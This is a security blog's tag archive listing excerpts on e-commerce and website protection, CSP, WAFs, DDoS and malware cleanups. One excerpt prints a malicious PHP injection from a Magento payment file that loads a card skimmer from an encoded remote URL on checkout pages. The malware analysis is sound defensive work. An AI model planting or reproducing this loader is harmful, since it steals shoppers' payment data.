As shopping season approaches once again, we’d like to give you some helpful advice when it comes to managing an e-commerce site, and how to avoid being the target of an attack. Due to the pandemic, more people are spending their time shopping for gifts online than ever before. Global e-commerce sales are projected to […]
Tag Archives: sucuri
Network Firewall vs. Web Application Firewall (WAF)
When the world shut their doors and began spending more time online, hackers saw a clear opportunity. The costs of data breaches continue to rise, and attacks are becoming harder to detect. Attackers are becoming more sophisticated and creative. According to a 2020 report by IBM, it took an average of 228 days to identify […]
How to Set Up a Content Security Policy (CSP) in 3 Steps
What is a Content Security Policy (CSP)? A CSP is a policy that uses headers or meta elements to restrict or greenlight what content loads onto your website. It is a widely-supported security standard recommended to anyone who operates a website. Why do you Need it ? Using a CSP adds a layer of protection […]
7 Scary Good Tips to Secure Your Website
Nothing pairs quite as well as cybersecurity and Halloween. Prepare for more than trick-or-treaters this spooky season with these 5 wicked Website Security tips. 1 – Make a horcrux ( aka backup your data) – In Harry Potter, a horcrux lets wizards store a fragment of their soul in different objects as a safeguard against […]
5 Types of Hackers & Why They Hack
When considering why hackers are attacking websites, you might think that there’s a specific reason they target you as a website owner—your business, your reputation, or your information. The truth is, while it feels personal to the victim, hackers rarely single out specific targets. Most of the time, hackers perform mass searches for specific vulnerabilities, […]
How to Know If You Are Under DDoS Attack
Nowadays, the term DDoS probably raises the heart rate of most webmasters. Though many don’t know exactly what a DDoS attack is, they do know the effect: an extremely sluggish or shut-down website. In this article, we’ll focus on how to know if your website is under attack and how to protect it. Hopefully, we […]
Optimizing Performance and Behavior with WordPress and the Sucuri WAF
Aside from providing significant protection from a wide range of threats, the Sucuri WAF also acts as a CDN due to its caching capabilities and regional PoPs — often performing even better than dedicated CDNs based on recent tests. CDNs can significantly help speed up your website by storing and delivering content as close to […]
Magento PHP Injection Loads JavaScript Skimmer
A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php … if ($_SERVER[“REQUEST_METHOD”] === “GET”){ if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){ if(!isset($_COOKIE[“adminhtml”])){ echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”)); } } } To make it more difficult to […]
Sucuri Sit-Down Episode 4: XSS & WP Plugin Vulnerabilities with Antony Garand
October is National Cyber Security Awareness Month, and we’re back with analyst Antony Garand to take a deeper look into cross site scripting (XSS) attacks and WordPress plugin vulnerabilities. Plus, host Justin Channell will catch you up on the latest website security news from the Sucuri blog. For further reading about any of these topics, […]
Redirects to YouTube Defacement Channel
During a recent investigation, we found an infected website was redirecting to YouTube after its main index.php file had been modified to include the following line of HTML: This technique works because it’s possible to use HTML within .php files — as long as the HTML is outside the PHP code tags. In this case, […]